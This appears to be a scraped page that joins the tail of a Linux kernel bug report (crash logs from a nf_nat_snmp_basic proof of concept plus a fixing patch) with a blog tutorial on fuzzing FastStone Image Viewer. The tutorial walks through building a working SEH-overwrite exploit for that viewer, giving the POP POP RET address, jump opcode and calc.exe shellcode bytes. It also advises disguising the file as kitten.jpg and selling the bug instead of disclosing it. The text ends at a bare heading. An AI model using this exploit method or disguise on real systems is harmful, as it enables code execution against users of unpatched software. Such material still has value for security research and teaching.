disabled. [ 260.137085] LoadPin: kernel-module pinned obj="/lib/modules/5.0.0-rc5/kernel/net/bpfilter/bpfilter.ko" pid=1095 cmdline="/sbin/modprobe -q -- bpfilter" [ 260.143100] bpfilter: Loaded bpfilter_umh pid 1096 [ 260.171851] IPVS: ftp: loaded support on port[0] = 21 [ 260.248339] IPv6: ADDRCONF(NETDEV_CHANGE): veth0: link becomes ready [ 260.250475] IPv6: ADDRCONF(NETDEV_CHANGE): veth1: link becomes ready [ 260.261136] IPVS: ftp: loaded support on port[0] = 21 [ 260.347678] IPv6: ADDRCONF(NETDEV_CHANGE): veth3: link becomes ready [ 260.621924] page:ffffea000703de00 count:0 mapcount:-128 mapping:0000000000000000 index:0x0 [ 260.624264] flags: 0x17fffc000000000() [ 260.625373] raw: 017fffc000000000 ffffea0007a6d408 ffffea000783fe08 0000000000000000 [ 260.627650] raw: 0000000000000000 0000000000000003 00000000ffffff7f 0000000000000000 [ 260.629926] page dumped because: VM_BUG_ON_PAGE(page_ref_count(page) == 0) [ 260.631958] ------------[ cut here ]------------ [ 260.633312] kernel BUG at ./include/linux/mm.h:546! 
[ 260.634771] invalid opcode: 0000 [#1] PREEMPT SMP DEBUG_PAGEALLOC KASAN [ 260.636693] CPU: 6 PID: 1121 Comm: udp_repro Not tainted 5.0.0-rc5 #263 [ 260.638583] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014 [ 260.641031] RIP: 0010:do_exit+0x1391/0x1440 [ 260.642266] Code: 89 86 68 05 00 00 48 89 ac 24 e0 00 00 00 e9 2a f5 ff ff 4d 89 fd e9 6d f2 ff ff 48 c7 c6 c0 cf 67 99 48 89 ef e8 ef a5 24 00 <0f> 0b 48 8d bb 20 05 00 00 e8 11 77 2b 00 48 8d bb 18 05 00 00 4c [ 260.647667] RSP: 0018:ffff8881e083fd98 EFLAGS: 00010286 [ 260.649556] RAX: 000000000000003e RBX: ffff8881deed4240 RCX: 0000000000000000 [ 260.651639] RDX: 0000000000000000 RSI: dffffc0000000000 RDI: ffffffff9b65eaa0 [ 260.653712] RBP: ffffea000703de00 R08: ffffed103d633ec9 R09: ffffed103d633ec9 [ 260.655786] R10: 0000000000000001 R11: ffffed103d633ec8 R12: ffffea000703de34 [ 260.657857] R13: ffff8881e6262140 R14: ffff8881e083f918 R15: ffff8881e083fe78 [ 260.659939] FS: 0000000000000000(0000) GS:ffff8881eb180000(0000) knlGS:0000000000000000 [ 260.662281] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 260.664171] CR2: 00007fe2da7af5e0 CR3: 000000002de2b002 CR4: 0000000000360ee0 [ 260.666987] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 260.670022] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [ 260.672035] Call Trace: [ 260.672761] ? release_task+0x860/0x860 [ 260.673864] ? __fd_install+0x88/0x140 [ 260.674946] ? handle_mm_fault+0x82/0x130 [ 260.676100] do_group_exit+0x79/0x120 [ 260.677157] __x64_sys_exit_group+0x28/0x30 [ 260.678362] do_syscall_64+0x73/0x160 [ 260.679440] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 260.680878] RIP: 0033:0x7fe2da7af618 [ 260.681922] Code: Bad RIP value. 
[ 260.682872] RSP: 002b:00007ffd5a5e12c8 EFLAGS: 00000246 ORIG_RAX: 00000000000000e7 [ 260.685057] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fe2da7af618 [ 260.687125] RDX: 0000000000000000 RSI: 000000000000003c RDI: 0000000000000000 [ 260.689197] RBP: 00007fe2daa8c8e0 R08: 00000000000000e7 R09: ffffffffffffff98 [ 260.691264] R10: 00007ffd5a5e1248 R11: 0000000000000246 R12: 00007fe2daa8c8e0 [ 260.693343] R13: 00007fe2daa91c20 R14: 0000000000000000 R15: 0000000000000000 [ 260.695412] Modules linked in: bpfilter [ 260.696776] ---[ end trace d5f4a4a31d762416 ]--- [ 260.698931] RIP: 0010:do_exit+0x1391/0x1440 [ 260.700171] Code: 89 86 68 05 00 00 48 89 ac 24 e0 00 00 00 e9 2a f5 ff ff 4d 89 fd e9 6d f2 ff ff 48 c7 c6 c0 cf 67 99 48 89 ef e8 ef a5 24 00 <0f> 0b 48 8d bb 20 05 00 00 e8 11 77 2b 00 48 8d bb 18 05 00 00 4c [ 260.705625] RSP: 0018:ffff8881e083fd98 EFLAGS: 00010286 [ 260.707183] RAX: 000000000000003e RBX: ffff8881deed4240 RCX: 0000000000000000 [ 260.708823] RDX: 0000000000000000 RSI: dffffc0000000000 RDI: ffffffff9b65eaa0 [ 260.710384] RBP: ffffea000703de00 R08: ffffed103d633ec9 R09: ffffed103d633ec9 [ 260.711888] R10: 0000000000000001 R11: ffffed103d633ec8 R12: ffffea000703de34 [ 260.713785] R13: ffff8881e6262140 R14: ffff8881e083f918 R15: ffff8881e083fe78 [ 260.715326] FS: 00007fe2dac99700(0000) GS:ffff8881eb180000(0000) knlGS:0000000000000000 [ 260.717071] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 260.718340] CR2: 00007fe2da7af5ee CR3: 000000002de2b002 CR4: 0000000000360ee0 [ 260.719867] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 260.721389] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [ 260.722923] Fixing recursive fault but reboot is needed! 
====================================================================== It also works against a Debian testing distro kernel if you first (as root) set kernel.unprivileged_userns_clone=1 and modprobe nf_nat_snmp_basic; splat: ====================================================================== [17260.886470] IPv6: ADDRCONF(NETDEV_UP): veth1: link is not ready [17260.887304] IPv6: ADDRCONF(NETDEV_UP): veth0: link is not ready [17260.887310] IPv6: ADDRCONF(NETDEV_CHANGE): veth0: link becomes ready [17260.887334] IPv6: ADDRCONF(NETDEV_CHANGE): veth1: link becomes ready [17260.930188] IPv6: ADDRCONF(NETDEV_UP): veth3: link is not ready [17260.931286] IPv6: ADDRCONF(NETDEV_CHANGE): veth3: link becomes ready [17261.115583] BUG: Bad page state in process Xorg pfn:276500 [17261.115588] page:ffffcf4ac9d94000 count:-1 mapcount:0 mapping:0000000000000000 index:0x0 [17261.115595] flags: 0x17fffc000000000() [17261.115598] raw: 017fffc000000000 dead000000000100 dead000000000200 0000000000000000 [17261.115599] raw: 0000000000000000 0000000000000000 ffffffffffffffff 0000000000000000 [17261.115601] page dumped because: nonzero _count [17261.115602] Modules linked in: veth xt_helper xt_conntrack nf_nat_snmp_basic nf_conntrack_snmp nf_conntrack_broadcast xt_CT xt_tcpudp nft_counter nft_chain_nat_ipv4 ipt_MASQUERADE nf_nat_ipv4 nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 nft_compat nf_tables nfnetlink uinput atm netrom appletalk psnap llc ax25 snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hda_core snd_hwdep snd_pcm snd_timer joydev qxl snd soundcore ttm drm_kms_helper drm sg evdev virtio_balloon serio_raw virtio_console crct10dif_pclmul crc32_pclmul pcspkr ghash_clmulni_intel button ip_tables x_tables autofs4 ext4 crc16 mbcache jbd2 fscrypto ecb btrfs xor zstd_decompress zstd_compress xxhash hid_generic usbhid hid raid6_pq libcrc32c crc32c_generic sr_mod cdrom ata_generic virtio_net net_failover virtio_blk failover crc32c_intel [17261.115641] ata_piix libata ehci_pci 
aesni_intel uhci_hcd aes_x86_64 ehci_hcd crypto_simd cryptd virtio_pci usbcore scsi_mod psmouse glue_helper virtio_ring i2c_piix4 usb_common virtio floppy [17261.115652] CPU: 14 PID: 653 Comm: Xorg Not tainted 4.19.0-1-amd64 #1 Debian 4.19.12-1 [17261.115653] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014 [17261.115654] Call Trace: [17261.115681] dump_stack+0x5c/0x80 [17261.115688] bad_page.cold.115+0x7f/0xb2 [17261.115690] get_page_from_freelist+0xf51/0x1200 [17261.115694] ? reservation_object_reserve_shared+0x32/0x70 [17261.115696] ? get_page_from_freelist+0x8c3/0x1200 [17261.115698] __alloc_pages_nodemask+0x112/0x2b0 [17261.115703] new_slab+0x288/0x6e0 [17261.115707] ? update_blocked_averages+0x3ca/0x560 [17261.115708] ___slab_alloc+0x378/0x500 [17261.115710] ? update_nohz_stats+0x41/0x50 [17261.115713] ? shmem_alloc_inode+0x16/0x30 [17261.115715] ? shmem_alloc_inode+0x16/0x30 [17261.115716] __slab_alloc+0x1c/0x30 [17261.115717] kmem_cache_alloc+0x192/0x1c0 [17261.115719] shmem_alloc_inode+0x16/0x30 [17261.115722] alloc_inode+0x1b/0x80 [17261.115725] new_inode_pseudo+0xc/0x60 [17261.115726] new_inode+0x12/0x30 [17261.115728] shmem_get_inode+0x49/0x220 [17261.115731] __shmem_file_setup.part.42+0x3f/0x130 [17261.115754] drm_gem_object_init+0x26/0x40 [drm] [17261.115758] qxl_bo_create+0x79/0x170 [qxl] [17261.115762] qxl_gem_object_create+0x60/0x120 [qxl] [17261.115764] ? qxl_map_ioctl+0x20/0x20 [qxl] [17261.115767] qxl_gem_object_create_with_handle+0x4e/0xb0 [qxl] [17261.115769] qxl_alloc_ioctl+0x42/0xa0 [qxl] [17261.115777] ? drm_dev_enter+0x19/0x50 [drm] [17261.115785] drm_ioctl_kernel+0xa1/0xf0 [drm] [17261.115807] drm_ioctl+0x1fc/0x390 [drm] [17261.115810] ? qxl_map_ioctl+0x20/0x20 [qxl] [17261.115812] ? ep_scan_ready_list.constprop.22+0x1fc/0x220 [17261.115814] ? __hrtimer_init+0xb0/0xb0 [17261.115816] ? timerqueue_add+0x52/0x80 [17261.115834] ? enqueue_hrtimer+0x38/0x90 [17261.115835] ? 
hrtimer_start_range_ns+0x1b7/0x2c0 [17261.115836] do_vfs_ioctl+0xa4/0x630 [17261.115840] ? __sys_recvmsg+0x83/0xa0 [17261.115841] ksys_ioctl+0x60/0x90 [17261.115843] __x64_sys_ioctl+0x16/0x20 [17261.115846] do_syscall_64+0x53/0x100 [17261.115851] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [17261.115852] RIP: 0033:0x7fb3e93d3747 [17261.115854] Code: 00 00 90 48 8b 05 49 a7 0c 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 19 a7 0c 00 f7 d8 64 89 01 48 [17261.115855] RSP: 002b:00007ffc43daf3f8 EFLAGS: 00003246 ORIG_RAX: 0000000000000010 [17261.115856] RAX: ffffffffffffffda RBX: 0000562c71bece00 RCX: 00007fb3e93d3747 [17261.115857] RDX: 00007ffc43daf430 RSI: 00000000c0086440 RDI: 000000000000000e [17261.115857] RBP: 00007ffc43daf430 R08: 0000562c71bece00 R09: 00000000000003d1 [17261.115858] R10: 0000562c71085010 R11: 0000000000003246 R12: 00000000c0086440 [17261.115858] R13: 000000000000000e R14: 0000562c710bcba0 R15: 0000562c710d82f0 [17261.115860] Disabling lock debugging due to kernel taint ====================================================================== I suggest the following patch (copy attached with proper whitespace); I have tested that it prevents my PoC from crashing the kernel, but I haven't tested whether SNMP NATting still works. ====================================================================== From b94c17fa81f8870885baaec7815eee8b789d2c7b Mon Sep 17 00:00:00 2001 From: Jann Horn <jannh@google.com> Date: Wed, 6 Feb 2019 22:56:15 +0100 Subject: [PATCH] netfilter: nf_nat_snmp_basic: add missing length checks in ASN.1 cbs The generic ASN.1 decoder infrastructure doesn't guarantee that callbacks will get as much data as they expect; callbacks have to check the `datalen` parameter before looking at `data`. Make sure that snmp_version() and snmp_helper() don't read/write beyond the end of the packet data. 
(Also move the assignment to `pdata` down below the check to make it
clear that it isn't necessarily a pointer we can use before the
`datalen` check.)

Fixes: cc2d58634e0f ("netfilter: nf_nat_snmp_basic: use asn1 decoder library")
Signed-off-by: Jann Horn <jannh@google.com>
---
 net/ipv4/netfilter/nf_nat_snmp_basic_main.c | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)

diff --git a/net/ipv4/netfilter/nf_nat_snmp_basic_main.c b/net/ipv4/netfilter/nf_nat_snmp_basic_main.c
index a0aa13bcabda..0a8a60c1bf9a 100644
--- a/net/ipv4/netfilter/nf_nat_snmp_basic_main.c
+++ b/net/ipv4/netfilter/nf_nat_snmp_basic_main.c
@@ -105,6 +105,8 @@ static void fast_csum(struct snmp_ctx *ctx, unsigned char offset)
 int snmp_version(void *context, size_t hdrlen, unsigned char tag,
		 const void *data, size_t datalen)
 {
+	if (datalen != 1)
+		return -EINVAL;
 	if (*(unsigned char *)data > 1)
 		return -ENOTSUPP;
 	return 1;
@@ -114,8 +116,11 @@ int snmp_helper(void *context, size_t hdrlen, unsigned char tag,
		 const void *data, size_t datalen)
 {
 	struct snmp_ctx *ctx = (struct snmp_ctx *)context;
-	__be32 *pdata = (__be32 *)data;
+	__be32 *pdata;
 
+	if (datalen != 4)
+		return -EINVAL;
+	pdata = (__be32 *)data;
 	if (*pdata == ctx->from) {
 		pr_debug("%s: %pI4 to %pI4\n", __func__,
			 (void *)&ctx->from, (void *)&ctx->to);
--
2.20.1.611.gfbb209baf1-goog

======================================================================

Sursa: https://www.exploit-db.com/exploits/46477
  22. Introduction to File Format Fuzzing & Exploitation

Daniel C
Mar 4

This post will explain the process of finding and exploiting a previously unknown vulnerability in a real-world piece of software to achieve code execution. The vulnerability was initially found in 2016 and the vendor was contacted; however, no response was ever received. Now, several years later (March 2019 at the time of writing), the vulnerability still exists in the latest version.

Please note that this post is supposed to serve as a basic introduction to file format fuzzing; I’m fully aware that the fuzzing methods used in this post are somewhat outdated. Also, if you think I have explained something badly or something is completely incorrect then please let me know. -Daniel

tl;dr

The Target

FastStone Image Viewer 6.9 — http://www.faststone.org/FSViewerDetail.htm

Never heard of it? Me neither; however, for some reason it has 13.8 million downloads on CNET. Additionally, the application has been hosted on its own website for the last few years, so the total number of downloads is likely much higher.

What you will need

32bit Windows 7 Virtual machine
FastStone Image Viewer 6.9
Windbg
.NET Framework 4
Immunity Debugger
Peach Community Edition v3
010 Editor
Text Editor of your choice
fuzz.zip containing Config/Sample/Crash files for Peach. I have also included a copy of FSViewer in case the FastStone site goes down in the future.

Fuzzing

“Fuzz testing or fuzzing is a Black Box software testing technique, which basically consists in finding implementation bugs using malformed/semi-malformed data injection in an automated fashion.” — OWASP

File format fuzzing is relatively simple. You provide your fuzzer with a legitimate file sample; the fuzzer then repeatedly mutates the sample and opens it in the target application. If the target application crashes, something has obviously gone wrong, and the mutated file is saved to be reviewed at a later date.
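The mutate-and-open loop just described is simple enough to sketch in Python. This is only a toy illustration of the idea, not Peach itself; the viewer path is a placeholder, and a real harness would run the target under a debugger to catch access violations rather than relying on exit codes:

```python
import random
import subprocess

def mutate(data: bytes, n_flips: int = 4) -> bytes:
    """Return a copy of `data` with a few randomly chosen bytes replaced."""
    buf = bytearray(data)
    for _ in range(n_flips):
        buf[random.randrange(len(buf))] = random.randrange(256)
    return bytes(buf)

def fuzz_once(viewer_exe: str, sample: bytes, out_path: str, timeout: float = 5.0) -> bool:
    """Write one mutated file, open it in the target, and report whether it is worth reviewing."""
    with open(out_path, "wb") as f:
        f.write(mutate(sample))
    try:
        # A real harness (like Peach) attaches windbg to the target; a
        # non-zero exit code is only a crude stand-in for a crash signal.
        proc = subprocess.run([viewer_exe, out_path], timeout=timeout)
        return proc.returncode != 0
    except subprocess.TimeoutExpired:
        return False  # the viewer opened the file and kept running: no crash
```

In a loop, every mutated file that returns True would be saved alongside its exit status for later triage.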
As the original file doesn’t crash the application but your mutated file does, it is possible you have some sort of control over this crash. If you can control what is read/written/executed in memory, you may be able to take control of the application flow. If you control the application flow, you can make the application do things it is not supposed to.

Configuring the Fuzzing VM

The fuzzing framework we will be using is Peach Community Edition. It’s a bit outdated but should be fine for a basic introduction.

Step 1) Install everything

Once you have a Windows 7 VM set up, install all the tools listed above and extract fuzz.zip onto the desktop. Fuzz.zip will contain the following files:

FSViewerSetup69.exe — A backup copy of FSViewer in case their site goes down in the future;
Sample.cur — This is your test case; when running, Peach will select this file, mutate it, and open it within FSViewer;
Cur.xml — This is your Peach “pit” file, used to configure the Peach framework;
Crash.cur — This is the original crash that Peach found;
ExploitFinal.jpg — The proof-of-concept exploit you should have at the end of this post.

Step 2) Configure Peach

Configuring Peach requires a bit more work:

After downloading, right click the zip folder, select Properties, and click “unblock” (not everyone will have to do this);
Extract all files and copy them to C:\peach;
Create a folder called samples_cur (C:\peach\samples_cur);
Move sample.cur (from fuzz.zip) into C:\Peach\samples_cur\;
Move cur.xml (from fuzz.zip) into C:\Peach\;
Edit cur.xml and make any necessary changes. I have commented the important lines of cur.xml, so everything should be self-explanatory.

Step 3) Test Peach

You can test that your Peach pit has been configured correctly by opening cmd.exe (as an administrator) and running the following commands:

C:\Windows\System32> cd c:\peach
C:\Peach> peach -1 cur.xml

Hopefully you should see FSViewer open our sample.cur file once and then close.
Assuming this is successful, you may wish to disable your network adaptor for the VM. Some software automatically sends crash reports to the vendor. As vulnerabilities these days have a monetary value and clear legal methods exist to sell them, you may not wish to disclose the vulnerabilities directly to the vendor. 😊

Step 4) Running Peach

To start fuzzing, open cmd.exe as an administrator and execute the following commands:

C:\Windows\System32> cd c:\peach
C:\Peach> peach cur.xml

Peach should begin opening mutated files in (relatively) quick succession. There are a number of steps you can take to speed up fuzzing with Peach. I usually set the desktop to a blank background, reduce visual effects for the machine (right click "My Computer" > Properties > Advanced System Settings > select the "Advanced" tab > Performance Settings > Adjust for best performance), and kill explorer.exe (if you wish to start Explorer again, you can press Ctrl+Alt+Del and start ‘explorer’ as a new task).

Unfortunately, the biggest bottleneck with this rig is probably the Peach framework itself. By design, Peach opens the target application, mutates a file, loads the mutated file, waits to see if it crashes, and then closes the target application. Obviously, a lot of CPU cycles are wasted opening and closing the application instead of opening multiple mutated files in the existing process.

You’re also probably wondering why I chose to fuzz the cursor (.cur) file type, as surely no one would trust such a random file extension? Firstly, I made the assumption that if people have targeted this software before, it was probably via JPEG/BMP/GIF/other common image types, so rare image formats may be more fruitful for bugs. Additionally, most applications don’t use the file extension to identify file types; they use magic numbers, and fortunately for us FastStone Image Viewer is no different.
We can rename our file to a more trustworthy extension such as .jpg and FastStone will still process the file as a cursor, and our exploit will be triggered all the same.

Reviewing our Crash

After a few hours of fuzzing you will probably have quite a few unique crashes. By default, Peach uses a windbg extension called !exploitable to triage vulnerabilities into unique crashes (you can find this at C:\Peach\Debuggers\DebugEngine\MSEC). !exploitable marks crashes as ‘exploitable’, ‘probably exploitable’, ‘unknown’, and ‘probably not exploitable’. Whilst these ratings are useful for separating different unique crashes, they should otherwise be completely ignored: !exploitable only looks at the first crash and the events leading up to it; it does not look at what happens after the exception, or at later exceptions. For example, the first exception may be a read access violation, and !exploitable will mark this as ‘probably not exploitable’ or ‘unknown’; however, skipping this exception manually may result in a later exception where the instruction pointer (EIP) is overwritten with user-controllable data (clearly exploitable).

After reviewing the descriptions for each crash, I came across the following, which !exploitable rated ‘UNKNOWN’. A sample of this crash (crash.cur) may be found in fuzz.zip:

First chance exceptions are reported before any exception handling.
eax=1101ffff ebx=0048189c ecx=75dc9e17 edx=000005f0 esi=0048189c edi=05e2afb4
eip=005ac745 esp=0012f4e0 ebp=0012f988 iopl=0         nv up ei pl nz ac po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210213
image00400000+0x1ac745:
005ac745 8b00            mov     eax,dword ptr [eax]  ds:0023:1101ffff=????????

As you can see, it’s a read access violation (it’s trying to read from the address 1101ffff into EAX). Assuming we have some sort of control over the 1101ffff value, we may be able to get an address of our own moved into EAX.
We then have to follow the execution of the application to see if this value is later used for something potentially exploitable. If this were a more worthy target, or I didn’t have numerous other crashes to review, I might be willing to look further into this crash, but for FastStone Image Viewer™ I am not. As mentioned before, !exploitable only looks at the first exception and the events leading up to it, so let’s load this into a debugger and open our crash file. We can skip this first exception and see if anything more interesting occurs later on.

FSViewer comes with a file browser to select images. If you have more than one crash file in a directory, it may automatically crash on one of them when opening the directory; to avoid this, I opted to use the command line to select specific files:

C:\Program Files\Debugging Tools for Windows (x86)>windbg “C:\Program Files\FastStone Image Viewer\FSViewer.exe” “C:\Documents and Settings\Daniel\Desktop\crash.cur”

Once windbg has loaded, type ‘g’ and press Enter to run the application (alternatively, hit F5). It should first break at the read access violation mentioned above. We wish to skip this, so type ‘g’ (or F5) again to continue running.

005ac745 8b00            mov     eax,dword ptr [eax]  ds:0023:1101ffff=????????
0:000> g
First chance exceptions are reported before any exception handling.
eax=00000000 ebx=00000000 ecx=1111110f edx=776d6d1d esi=00000000 edi=00000000
eip=1111110f esp=0012ef98 ebp=0012efb8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210246
1111110f ??              ???

As we can see, the value of the EIP register has been overwritten with 1111110f. The EIP register contains the address of the next instruction to be executed, which means a mutation our fuzzer made to sample.cur has resulted in EIP pointing somewhere it should not. Perhaps we have some sort of control over this EIP value? This is definitely more interesting than the original crash.
Let’s diff our two files (sample.cur and crash.cur) in the 010 hex editor to see what changes the fuzzer actually made.

Mincrash

Peach has made a single change to the line beginning at 0x30. Whilst 010 Editor doesn’t have a template for the .cur file format, it does have a template for the .ico format, which is very similar (simply change the start of the file from 00 00 02 to 00 00 01). Using this we can revert the changes made by Peach back to the values of sample.cur. The purpose of this is to find the minimum number of changes that still results in the same crash. We can see that our changes all occur within the BITMAPINFOHEADER structure, which starts at 0x26 and ends at 0x4D. Looking closer at the file format, we can see that the change Peach made first affects biHeight. From our file diff above, we can see that the two bytes at 0x30 in sample.cur were 00 00, so let’s revert this change and test the crash again in windbg:

eax=00000000 ebx=00000000 ecx=1111110f edx=776d6d1d esi=00000000 edi=00000000
eip=1111110f esp=0012ef98 ebp=0012efb8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210246
1111110f ??              ???

Still the same crash. This process was repeated until it was found that we could revert all of the changes except those to biBitCount and still hit the same exception. Let’s call this file mincrash.cur.

Controlling EIP

Interestingly, the value overwriting EIP (1111110f) can be found in mincrash.cur seven times (due to endianness this will be backwards, e.g. 12345678 becomes 78563412). Let’s try overwriting them with easy-to-identify values such as 41414141 (hex for AAAA), 42424242 (BBBB), etc., save this file under another name (EIP.cur), and once again open it in the debugger (always try to keep backups of your files at each step; it saves you from trying to revert changes later on when everything stops working!).
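If you prefer the command line to 010 Editor for the diffing step, the same byte-level comparison can be done with a few lines of Python (the file names are the ones used in this post):

```python
def byte_diff(a: bytes, b: bytes):
    """Return (offset, old, new) for every byte position where the files differ."""
    return [(i, x, y) for i, (x, y) in enumerate(zip(a, b)) if x != y]

# Typical usage against the two samples from this post:
# with open("sample.cur", "rb") as f1, open("crash.cur", "rb") as f2:
#     for off, old, new in byte_diff(f1.read(), f2.read()):
#         print(f"0x{off:04X}: {old:02X} -> {new:02X}")
```

Note that zip() stops at the shorter file, so a length check is worth adding if the mutation can grow or truncate the sample.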
After skipping the first exception you should see the following:

eax=00000000 ebx=00000000 ecx=45454545 edx=776d6d1d esi=00000000 edi=00000000
eip=45454545 esp=0012ef98 ebp=0012efb8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210246
45454545 ??              ???

It looks like we have been very fortunate and have complete control of the EIP register… Excellent! Revert the other changes back to their original 0f111111 values (try to keep changes to the file minimal). Using the !exchain command we can see the current exception handler chain:

45454545 ??              ???
0:000> !exchain
0012efac: ntdll!ExecuteHandler2+3a (776d6d1d)
0012f9a0: 45454545
Invalid exception stack at 0000f011

It looks like we are overwriting the pointer to the SE handler. If you’re not familiar with SEH-based exploits, now would be a great time to read the FuzzySecurity or Corelan exploit writing tutorials. General practice for SEH-based exploits is to overwrite nSEH with a jump to our shellcode and overwrite SEH with a reference to a POP POP RET. So let’s try that.

POP POP RET

First of all, we must find a POP POP RET instruction sequence in either the application itself or a loaded dll. A loaded .dll file is generally preferred, as dlls tend to sit at high memory addresses that do not contain null bytes (depending on the root cause of the vulnerability, null bytes may break your exploit). Fortunately for us, this vulnerability doesn’t seem to be affected by null bytes. Using Process Explorer we can see that the FSViewer executable does not make use of ASLR or DEP, so let’s just use a POP POP RET from FSViewer.exe. To find the POP POP RET sequence we can use mona.py:

0:007> .load pykd.pyd
0:007> !py mona seh
--- snip ---
[+] Results :
0x004071e7 | 0x004071e7 : pop ecx # pop ebp # ret 0x04

So let’s overwrite our EIP with E7714000 (little endian), and save our changes to exploit.cur.
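The little-endian conversion done by hand here can be double-checked with Python's struct module:

```python
import struct

# Pack the POP POP RET address as a 32-bit little-endian value,
# i.e. the exact byte order we write into the file.
seh = struct.pack("<I", 0x004071E7)
print(seh.hex())  # e7714000
```

The same one-liner works in reverse with struct.unpack("<I", ...) when reading an address back out of a hex dump.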
From here on I will be using Immunity Debugger, as I believe it is much easier to follow the exploit process visually.

Writing our Exploit

First, let’s open the FSViewer binary in Immunity Debugger with our exploit.cur file as an argument, click the goto-address button (subtly shown below), type the address of our POP POP RET (004071e7), and press OK. Set a breakpoint on POP ECX (highlight the instruction and press F2; alternatively, right click > Breakpoint > Toggle).

Now that we have our breakpoint set, we can run the program within Immunity Debugger. Due to the address we have chosen, we will hit our breakpoint multiple times as FSViewer loads. Keep pressing F9 until we hit our exception (“Access violation when reading [1101ffff]” at the bottom of ImmDbg). To skip the exception press Shift+F9. We should now be back at our breakpoint and see our POP POP RET. Use F8 to step one instruction at a time whilst keeping an eye on the stack (bottom right). Each POP instruction will remove an address from the stack and save it into ECX and EBP respectively. Once we step over (F8) the return instruction, we will return to 0x0012F9A0 (shown).

That ASM doesn’t look good at all… However, notice the opcodes: 11F0 0000 E771 40 0010. Look familiar? As mentioned earlier, “General practice for SEH based exploits is to overwrite nSEH with a jump to our shellcode and overwrite SEH with a reference to a POP POP RET.” So, we’ve overwritten SEH with a reference to a POP POP RET, which lands us at nSEH (0x4FE in exploit.cur). This means we have 4 bytes spare to jump to our shellcode. Fortunately for us, image formats are very forgiving, so we can put our shellcode pretty much wherever we want, provided it’s not in the header and doesn’t overwrite our POP POP RET address. I opted to use a small jump over our SEH address at 0x502, landing on the other side where we have plenty of room for our shellcode. I used a short jump of 0x26 bytes (the opcode for this is EB 26).
So, let’s replace the bytes at 0x4FE with our jump opcode and save our file as exploitJmp.cur. Now let’s go back to ImmDbg and see this in action (don’t forget to change the argument name to exploitJmp.cur!). Hopefully the breakpoint should still be set; if not, go to 0x004071e7 and set it again. As before, repeatedly hit F9 until we get to our access violation, press Shift+F9 to get to our breakpoint, and step three times (F8). Instead of ADC EAX, ESI we now see JMP SHORT 0012F9C8 (opcode EB 26). Pressing F8 again, you will jump 0x26 bytes to 0012F9C8. We now have plenty of room for our shellcode.

I’ll be using a simple calc.exe shellcode commandeered from FuzzySecurity’s “Writing W32 Shellcode” tutorial. I’ll also add a few NOPs at the beginning for reliability.

"\xd9\xec\xd9\x74\x24\xf4\xb8\x28\x1f\x44\xde\x5b\x31\xc9\xb1"
"\x33\x31\x43\x17\x83\xeb\xfc\x03\x6b\x0c\xa6\x2b\x97\xda\xaf"
"\xd4\x67\x1b\xd0\x5d\x82\x2a\xc2\x3a\xc7\x1f\xd2\x49\x85\x93"
"\x99\x1c\x3d\x27\xef\x88\x32\x80\x5a\xef\x7d\x11\x6b\x2f\xd1"
"\xd1\xed\xd3\x2b\x06\xce\xea\xe4\x5b\x0f\x2a\x18\x93\x5d\xe3"
"\x57\x06\x72\x80\x25\x9b\x73\x46\x22\xa3\x0b\xe3\xf4\x50\xa6"
"\xea\x24\xc8\xbd\xa5\xdc\x62\x99\x15\xdd\xa7\xf9\x6a\x94\xcc"
"\xca\x19\x27\x05\x03\xe1\x16\x69\xc8\xdc\x97\x64\x10\x18\x1f"
"\x97\x67\x52\x5c\x2a\x70\xa1\x1f\xf0\xf5\x34\x87\x73\xad\x9c"
"\x36\x57\x28\x56\x34\x1c\x3e\x30\x58\xa3\x93\x4a\x64\x28\x12"
"\x9d\xed\x6a\x31\x39\xb6\x29\x58\x18\x12\x9f\x65\x7a\xfa\x40"
"\xc0\xf0\xe8\x95\x72\x5b\x66\x6b\xf6\xe1\xcf\x6b\x08\xea\x7f"
"\x04\x39\x61\x10\x53\xc6\xa0\x55\xab\x8c\xe9\xff\x24\x49\x78"
"\x42\x29\x6a\x56\x80\x54\xe9\x53\x78\xa3\xf1\x11\x7d\xef\xb5"
"\xca\x0f\x60\x50\xed\xbc\x81\x71\x8e\x23\x12\x19\x7f\xc6\x92"
"\xb8\x7f"

After making the changes and saving our file as exploitFinal.cur, our file should look like this (tip: use Ctrl+Shift+V in 010 Editor to paste as hex). Let’s test each step one last time in ImmDbg to make sure we understand what’s going on.
Skipping the access violation (Shift+F9), we land at our breakpoint. Stepping three times (F8), we land at our short jump. Stepping again, we (hopefully) land in the middle of our NOP sled. After our NOP sled we can see the start of our shellcode. So far so good. Hit F9 to continue execution and you should hopefully see calc.exe spawn, as it did in my tl;dr video above. As previously mentioned, FastStone Image Viewer doesn’t rely on file extensions to identify file types, so as a final step let’s rename exploitFinal.cur to a more trustworthy file type such as kitten.jpg. Who would suspect a jpeg (or a kitten)?

Root Cause Analysis

